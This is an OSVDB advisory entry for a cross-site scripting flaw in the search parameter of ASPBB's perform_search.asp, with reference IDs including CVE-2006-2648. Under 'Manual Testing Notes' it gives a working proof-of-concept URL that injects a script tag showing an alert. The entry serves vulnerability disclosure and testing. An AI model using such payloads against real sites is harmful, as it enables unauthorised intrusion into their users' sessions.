ASPBB perform_search.asp search Variable XSS

2006-05-28T10:04:46
ID OSVDB:25788
Type osvdb
Reporter OSVDB
Modified 2006-05-28T10:04:46

Description

Manual Testing Notes

http://[target]/perform_search.asp?search="><script>alert('X');</script>

References:

Vendor URL: http://www.aspbb.org/ Secunia Advisory ID:20360 Other Advisory URL: http://www.nukedx.com/?viewdoc=32 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0636.html FrSIRT Advisory: ADV-2006-2027 CVE-2006-2648 Bugtraq ID: 18146